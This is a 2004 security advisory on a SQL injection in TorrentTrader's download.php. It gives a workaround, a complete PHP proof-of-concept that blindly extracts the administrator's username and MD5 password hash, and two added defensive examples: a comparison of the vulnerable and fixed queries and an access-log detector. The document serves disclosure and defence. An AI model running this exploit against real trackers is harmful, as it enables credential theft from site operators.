[UNIX] TorrentTrader SQL Injection

From: SecuriTeam (support_at_securiteam.com)
Date: 09/06/04

    To: list@securiteam.com
    Date: 6 Sep 2004 13:04:00 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      TorrentTrader SQL Injection
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.torrenttrader.com/> TorrentTrader is a feature packed and
    highly customisable open-source BitTorrent tracker."

    Due to insufficient sanity checks on input variables it is possible to
    perform SQL injection through TorrentTrader and retrieve the
    administrative username and MD5 password hash.

    DETAILS

    Vulnerable Systems:
     * TorrentTrader version 1.0 RC2, possibly prior

    The 'id' parameter of the download.php script is not sanitized before it
    is used in an SQL query. An attacker can therefore alter that query by
    supplying arbitrary SQL code in the parameter.

    Proof of concept code is provided which dumps the username and password
    MD5 hash of the first user in the torrent web application's database,
    which should be the administrator. Naturally, the script is adaptable so
    that other usernames and password MD5s can be obtained. First it fetches
    a valid torrent id, then it determines whether the database user can
    perform the "union select" construct, and finally it obtains the username
    and password MD5 hash.

    Usage:
    $ php4 -q ./tt_sqli_poc.php "http://127.0.0.1/torrenttrade"

    Workaround
    A simple workaround is to edit line 13 of download.php and replace:
    $res = mysql_query("SELECT filename FROM torrents WHERE id = $id");

    with:
    $res = mysql_query("SELECT filename FROM torrents WHERE id = ".intval($id));
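    The effect of the workaround, shown as an added example rather than TorrentTrader's own code: the download.php query from the advisory is run in its vulnerable form, with the intval() workaround, and with up-front validation plus a prepared statement, against an in-memory SQLite database so each variant can be observed offline. It assumes PHP 7.1 or later with the pdo_sqlite extension; the schema and rows are constructed for the demonstration, using only the table and column names the advisory mentions.

```php
<?php
// Added example, not TorrentTrader's own code: the download.php query from the
// advisory in its vulnerable form, with the intval() workaround, and with a
// prepared statement. Runs against an in-memory SQLite database so the effect
// of each variant can be observed offline. Assumes PHP 7.1+ with pdo_sqlite.

function setupDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Constructed schema using the table and column names the advisory mentions
    // (torrents.id, torrents.filename, users.username, users.password); the
    // rows are sample data and the hash value is a placeholder.
    $db->exec('CREATE TABLE torrents (id INTEGER PRIMARY KEY, filename TEXT)');
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    $db->exec("INSERT INTO torrents VALUES (1, 'debian-3.0.iso.torrent')");
    $db->exec("INSERT INTO users VALUES (1, 'admin', 'PLACEHOLDER_MD5_HASH')");
    return $db;
}

// Vulnerable: the request parameter is interpolated into the SQL text, as on
// line 13 of download.php according to the advisory. Whatever follows the
// number becomes part of the statement.
function filenameVulnerable(PDO $db, string $id): ?string {
    $row = $db->query("SELECT filename FROM torrents WHERE id = $id")->fetch(PDO::FETCH_NUM);
    return $row ? $row[0] : null;
}

// The advisory's workaround: intval() keeps only the leading integer, so no
// SQL syntax reaches the query. Sufficient here because id is always a number.
function filenameIntval(PDO $db, string $id): ?string {
    $row = $db->query("SELECT filename FROM torrents WHERE id = " . intval($id))->fetch(PDO::FETCH_NUM);
    return $row ? $row[0] : null;
}

// Preferred form: validate the parameter first and bind it to a prepared
// statement, so data and query structure stay separate for any column type.
function filenamePrepared(PDO $db, string $id): ?string {
    if (!preg_match('/^\d{1,9}$/', $id)) {
        return null;                     // not a plausible torrent id: refuse it
    }
    $stmt = $db->prepare('SELECT filename FROM torrents WHERE id = :id');
    $stmt->bindValue(':id', (int)$id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row ? $row[0] : null;
}

$db = setupDb();
// Constructed inputs: a plain id, and an id of the shape the advisory describes,
// a valid number followed by a UNION that reads a column from the users table.
$inputs = ['1', '1 AND 0 UNION SELECT username FROM users'];

foreach ($inputs as $input) {
    printf("id = %s\n", var_export($input, true));
    printf("  vulnerable: %s\n", var_export(filenameVulnerable($db, $input), true));
    printf("  intval    : %s\n", var_export(filenameIntval($db, $input), true));
    printf("  prepared  : %s\n", var_export(filenamePrepared($db, $input), true));
}
```

    Run it with `php` from the command line. For the plain id all three functions return the torrent's filename; for the crafted value only the vulnerable variant returns the username from the users table, while the intval variant still answers for torrent 1 and the prepared variant rejects the value outright. The intval() workaround is enough for this integer column, but the validate-and-bind form is the one to reuse for parameters that are not integers.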

    Proof Of Concept
    #!/usr/bin/php
    <?php

    /*
        TorrentTrader 1.0 RC2 SQL Injection Proof of Concept
        By aCiDBiTS acidbits@hotmail.com 31-August-2004

        "TorrentTrader (http://www.torrenttrader.com/) is a feature packed and
        highly customisable open-source BitTorrent tracker."

        This PoC dumps the username and password's md5 hash of the first user
        in the TorrentTrader web application database, which should be the
        administrator. First it fetches a valid torrent id, then it determines
        if the database's user can perform "union select" and finally obtains
        the username and md5(password). Tested on TorrentTrader 1.0 RC2, maybe
        older versions are also vulnerable.

        Usage (in my debian box):
        php4 -q ./tt_sqli_poc.php "http://127.0.0.1/torrenttrade"

    ++ Vulnerability description & workaround ++

        There is no user input sanitization for parameter "id" in download.php
        prior to being used in a SQL query. This can be exploited to manipulate
        SQL queries by injecting arbitrary SQL code. A workaround to solve this
        is to modify download.php, line 13:

        $res = mysql_query("SELECT filename FROM torrents WHERE id = $id");

        With:

        $res = mysql_query("SELECT filename FROM torrents WHERE id = ".intval($id));

    */

    echo "+----------------------------------------------------------+\n| TorrentTrader 1.0 RC2 SQL Injection Proof of Concept |\n| By aCiDBiTS   acidbits@hotmail.com 31-August-2004   |\n+----------------------------------------------------------+\n\n";

    if($argc<2) die("Usage: ".$argv[0]." URL_to_TorrentTrader_script\n\n");
    $host=$argv[1];
    if(substr($host,strlen($host)-1,1)!='/') $host.='/';

    // Take the first torrent id linked from the tracker's front page.
    echo "[+] Getting valid torrent id ... ";
    $webc=get_web($host);
    $temp=explode("torrents-details.php?id=",$webc);
    $id=intval($temp[1]);
    if( !$id ) die( "Failed!\n\n");
    echo "OK\n Using Torrent id: $id\n\n";

    // A true condition must yield the "torrent has gone" page and a false one must not.
    echo "[+] Checking if injection is possible ... ";
    $bas=$id."%20and%200%20union%20select%201%20from%20users%20where%20";
    if( test_cond( $bas."1" ) && !test_cond( $bas."0" ) ) echo " OK\n\n";
    else die ("\n\n Failed! \n\n");

    echo "[+] Getting username & password ... \n Username: ";
    get_field( "username");
    echo "\n MD5(Password): ";
    get_field( "password" );

    die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\ //||\\\\\n\n");

    // Returns 1 when the injected condition holds, judged by the page text
    // download.php shows for an id that exists but has no file.
    function test_cond( $cond )
    {
        global $host;
        $res=get_web( $host."download.php?id=".$cond);
        if( eregi( "The ID has been found on the Database, but the torrent has gone!", $res ) )
            return 1;
        else return 0;
    }

    // Recovers $field of the first user one character at a time, binary
    // searching over $unval with server-side ord(substring()) comparisons.
    function get_field( $field )
    {
        global $bas;
        $unval= "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
        $idx=1;
        $min=0;
        $max=strlen($unval);
        while($min!=$max) {
            $mid=$min+(($max-$min)/2);
            if( test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1))) ) {
                $idx++;
                echo substr($unval,$mid,1);
                $min=0;
                $max=strlen($unval);
                // No character at the next position: the field is complete.
                if( !test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))") ) return;
            } else {
                if( test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1))) ) $max=$mid;
                else $min=$mid;
            }
        }
        die( "\n\nUnexpected error!\n\n");
    }

    // Fetches a URL with cURL and returns the response body.
    function get_web($url)
    {
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL, $url);
        curl_setopt ($ch, CURLOPT_HEADER, 0);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
        $data=curl_exec ($ch);
        curl_close ($ch);
        return $data;
    }

    /* \ /
       (Oo)
      //||\\ */

    ?>
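    A defender-side check for the request pattern the PoC above produces, added here and not part of the advisory: every request it sends carries a non-numeric id parameter to download.php, most contain a UNION SELECT against the users table, and the extraction phase adds ord(substring()) comparisons, several per recovered character from a single client. The script below scans access-log lines for those indicators and counts hits per client. The log lines are constructed in Apache combined log format, and the script assumes PHP 7.1 or later.

```php
<?php
// Added example, not part of the advisory: scan web server access-log lines for
// the request shape described in the advisory. Constructed sample lines in
// Apache combined log format; assumes PHP 7.1+.

$sampleLog = <<<'LOG'
10.0.0.7 - - [06/Sep/2004:13:04:01 +0200] "GET /torrenttrade/download.php?id=5 HTTP/1.0" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Sep/2004:13:04:02 +0200] "GET /torrenttrade/torrents-details.php?id=5 HTTP/1.0" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Sep/2004:13:04:03 +0200] "GET /torrenttrade/download.php?id=5%20and%200%20union%20select%201%20from%20users%20where%201 HTTP/1.0" 200 512 "-" "PHP/4.3"
10.0.0.9 - - [06/Sep/2004:13:04:04 +0200] "GET /torrenttrade/download.php?id=5%20and%200%20union%20select%201%20from%20users%20where%20id=1%20and%20ord(substring(password,1,1))=97 HTTP/1.0" 200 512 "-" "PHP/4.3"
10.0.0.9 - - [06/Sep/2004:13:04:05 +0200] "GET /torrenttrade/download.php?id=5%20and%200%20union%20select%201%20from%20users%20where%20id=1%20and%20ord(substring(password,1,1))%3C97 HTTP/1.0" 200 512 "-" "PHP/4.3"
LOG;

// Splits one combined-format line into client, timestamp, request path and status.
function parseLogLine(string $line): ?array {
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    return ['client' => $m[1], 'time' => $m[2], 'path' => $m[3], 'status' => (int)$m[4]];
}

// Returns the indicators found in the request's id parameter, or an empty
// array when the parameter is absent or is a plain integer.
function idIndicators(string $path): array {
    $query = parse_url($path, PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    parse_str($query, $params);          // percent-decodes the values
    if (!isset($params['id'])) {
        return [];
    }
    if (!is_string($params['id'])) {
        return ['id is not a scalar'];
    }
    $id = strtolower($params['id']);
    if (preg_match('/^\d+$/', $id)) {
        return [];                       // exactly what intval() would accept unchanged
    }
    $found = ['non-numeric id'];
    if (preg_match('/\bunion\b.*\bselect\b/', $id)) {
        $found[] = 'UNION SELECT';       // the PoC's capability check
    }
    if (preg_match('/\bord\s*\(\s*substring\s*\(/', $id)) {
        $found[] = 'ord(substring()) comparison';  // character-by-character extraction
    }
    return $found;
}

// Scans a whole log and returns one alert per suspicious request plus a
// per-client hit count; the count is what separates a probe from a bulk dump.
function scanAccessLog(string $log): array {
    $alerts = [];
    $perClient = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $entry = parseLogLine($line);
        if ($entry === null) {
            continue;
        }
        $indicators = idIndicators($entry['path']);
        if ($indicators === []) {
            continue;
        }
        $script = basename((string)parse_url($entry['path'], PHP_URL_PATH));
        $alerts[] = [
            'client' => $entry['client'],
            'time' => $entry['time'],
            'script' => $script,
            'indicators' => $indicators,
        ];
        $perClient[$entry['client']] = ($perClient[$entry['client']] ?? 0) + 1;
    }
    return ['alerts' => $alerts, 'per_client' => $perClient];
}

$result = scanAccessLog($sampleLog);
foreach ($result['alerts'] as $alert) {
    printf("%s %s %s: %s\n", $alert['time'], $alert['client'], $alert['script'],
        implode(', ', $alert['indicators']));
}
foreach ($result['per_client'] as $client => $count) {
    printf("client %s: %d suspicious request(s)\n", $client, $count);
}
```

    Run it with `php` to see the three crafted requests flagged and attributed to one client while the two ordinary requests pass. Because the PoC issues several requests per extracted character, the per-client count grows quickly; alerting on that count per script and client over a short window, rather than on a single matching request, keeps the rule useful on a busy tracker. The same indicators apply to any script that takes an id parameter, not only download.php.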

    ADDITIONAL INFORMATION

    The information has been provided by acidbits <acidbits@hotmail.com>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

